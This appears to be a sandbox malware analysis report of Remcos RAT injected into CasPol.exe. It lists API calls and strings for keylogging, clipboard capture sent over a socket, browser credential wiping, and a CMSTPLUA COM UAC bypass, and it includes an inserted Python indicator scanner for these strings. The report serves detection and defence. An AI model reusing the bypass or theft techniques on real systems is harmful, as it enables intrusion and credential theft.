                                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                            • API String ID: 65172268-860466531
                                                                                                            • Opcode ID: a717337548b7bc67ef5be46030ec01eef617e46586cf903e586267f0ffb0d611
                                                                                                            • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                            • Opcode Fuzzy Hash: a717337548b7bc67ef5be46030ec01eef617e46586cf903e586267f0ffb0d611
                                                                                                            • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                            • API String ID: 1164774033-3681987949
                                                                                                            • Opcode ID: 76fc6f2f8938e12f39c523e25d48290a13894f358b4903df99732470634f51ee
                                                                                                            • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                            • Opcode Fuzzy Hash: 76fc6f2f8938e12f39c523e25d48290a13894f358b4903df99732470634f51ee
                                                                                                            • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                            • API String ID: 3527384056-432212279
                                                                                                            • Opcode ID: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                                                            • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                            • Opcode Fuzzy Hash: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                                                            • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                            • API String ID: 726551946-3025026198
                                                                                                            • Opcode ID: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                                                            • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                            • Opcode Fuzzy Hash: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                                                            • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                            APIs
                                                                                                            • OpenClipboard.USER32 ref: 004159C7
                                                                                                            • EmptyClipboard.USER32 ref: 004159D5
                                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3520204547-0
                                                                                                            • Opcode ID: 92ff16621bb008ec349cac96769bc2e22541bc6f21a77906abd6e904815f1c10
                                                                                                            • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                            • Opcode Fuzzy Hash: 92ff16621bb008ec349cac96769bc2e22541bc6f21a77906abd6e904815f1c10
                                                                                                            • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0$1$2$3$4$5$6$7
                                                                                                            • API String ID: 0-3177665633
                                                                                                            • Opcode ID: ecb5ab5c14ee3ab28359405d5e5b6cf7107a78e006011c639a5add2d2d09b49f
                                                                                                            • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                            • Opcode Fuzzy Hash: ecb5ab5c14ee3ab28359405d5e5b6cf7107a78e006011c639a5add2d2d09b49f
                                                                                                            • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                            • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                            • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                            • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                            • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                            • String ID: 8[G
                                                                                                            • API String ID: 1888522110-1691237782
                                                                                                            • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                            • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                            • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                            • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Object_wcslen
                                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                            • API String ID: 240030777-3166923314
                                                                                                            • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                            • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                            • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                            • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                            APIs
                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                            • GetLastError.KERNEL32 ref: 00419935
                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3587775597-0
                                                                                                            • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                            • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                            • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                            • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                            • String ID: <D$<D$<D
                                                                                                            • API String ID: 745075371-3495170934
                                                                                                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                            • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                            • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2341273852-0
                                                                                                            • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                            • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                            • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                            • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                                            • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                            • API String ID: 341183262-3780268858
                                                                                                            • Opcode ID: 9a31d415458206e67b297c0ff902da26bb3864af038d5449f870ad87d369b2bb
                                                                                                            • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                            • Opcode Fuzzy Hash: 9a31d415458206e67b297c0ff902da26bb3864af038d5449f870ad87d369b2bb
                                                                                                            • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                            • API String ID: 2127411465-314212984
                                                                                                            • Opcode ID: f2af4c8a421ea6e9398857963b38f1f03d8e92c9919f27f2726a183544e4bb33
                                                                                                            • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                            • Opcode Fuzzy Hash: f2af4c8a421ea6e9398857963b38f1f03d8e92c9919f27f2726a183544e4bb33
                                                                                                            • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
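The entries above recover several high-value strings from the injected CasPol image: the COM elevation moniker and CMSTPLUA CLSID (with the UACMe-derived routine name ucmAllocateElevatedObject), the ieinstal.exe / ielowutil.exe injection targets, the dynamically resolved SHDeleteKeyW, and, in the entry below, the Chrome Login Data path passed to DeleteFileA. The script that follows is an added example, not Joe Sandbox output and not Remcos code: it scans a memory dump for those indicators in both ANSI and UTF-16LE form (the moniker is consumed by the wide CoGetObject, while the Chrome path goes to the ANSI DeleteFileA) and tags the behaviours they imply. The dump bytes and the behaviour labels are this example's own constructions.

```python
"""Scan a memory dump for the Remcos / CMSTPLUA-bypass string indicators
recovered in this report, in both ANSI and UTF-16LE encodings.

Added example: the indicator strings come from the report's disassembly
entries; the dump, the labels and the function names are constructed here.
"""
import re

# Indicator string -> behaviour tag. The tags are this example's assumption,
# not a Joe Sandbox classification.
INDICATORS = {
    "Elevation:Administrator!new:": "uac-bypass (COM elevation moniker)",
    "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}": "uac-bypass (CMSTPLUA CLSID)",
    "ucmAllocateElevatedObject": "uac-bypass (UACMe-derived routine name)",
    "ieinstal.exe": "process-injection target",
    "ielowutil.exe": "process-injection target",
    "SHDeleteKeyW": "registry cleanup via dynamic import",
    r"\AppData\Local\Google\Chrome\User Data\Default\Login Data":
        "chrome credential store wipe",
}

ENCODINGS = ("ascii", "utf-16-le")


def _compile_patterns():
    """One escaped byte regex per (indicator, encoding) pair."""
    pats = []
    for text, label in INDICATORS.items():
        for enc in ENCODINGS:
            pats.append((re.compile(re.escape(text.encode(enc))), text, enc, label))
    return pats


PATTERNS = _compile_patterns()


def scan(dump: bytes):
    """Return (offset, indicator, encoding, label) hits sorted by offset."""
    hits = []
    for rx, text, enc, label in PATTERNS:
        for m in rx.finditer(dump):
            hits.append((m.start(), text, enc, label))
    return sorted(hits)


def behaviours(dump: bytes):
    """Distinct behaviour tags implied by the hits, in sorted order."""
    return sorted({h[3] for h in scan(dump)})


def build_sample_dump() -> bytes:
    """Constructed stand-in for a process dump (NOT the real CasPol image).

    The elevation moniker and CLSID are laid out as one wide string, as a
    CoGetObject argument would be; the rest is ANSI, matching DeleteFileA /
    LoadLibraryA usage in the report.
    """
    wide = ("Elevation:Administrator!new:"
            "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}").encode("utf-16-le")
    chrome = (r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
              ).encode("ascii")
    return (b"MZ" + b"\x90" * 14
            + wide + b"\x00\x00"
            + b"Inj\x00ieinstal.exe\x00"
            + b"Shlwapi.dll\x00SHDeleteKeyW\x00"
            + b"UserProfile\x00" + chrome + b"\x00")


if __name__ == "__main__":
    for off, text, enc, label in scan(build_sample_dump()):
        print(f"0x{off:08x} {enc:9} {label:40} {text}")
```

Run it against a real .sdmp with `scan(open(path, "rb").read())`. Treat the tags as evidence to weigh, not verdicts: ieinstal.exe and ielowutil.exe also appear in benign Internet Explorer paths, so they only matter alongside the injection and elevation strings, whereas the "Elevation:Administrator!new:" moniker paired with the CMSTPLUA CLSID is a strong stand-alone signal.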
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                                            Strings
                                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                            • UserProfile, xrefs: 0040B227
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                            • API String ID: 2018770650-1062637481
                                                                                                            • Opcode ID: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                                                            • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                            • Opcode Fuzzy Hash: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                                                            • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                            • API String ID: 3534403312-3733053543
                                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 4043647387-0
                                                                                                            • Opcode ID: e6d26fc3e43131747f23564c7bb6c2c23fda576562a32a53d96f0f7b65159877
                                                                                                            • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                            • Opcode Fuzzy Hash: e6d26fc3e43131747f23564c7bb6c2c23fda576562a32a53d96f0f7b65159877
                                                                                                            • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
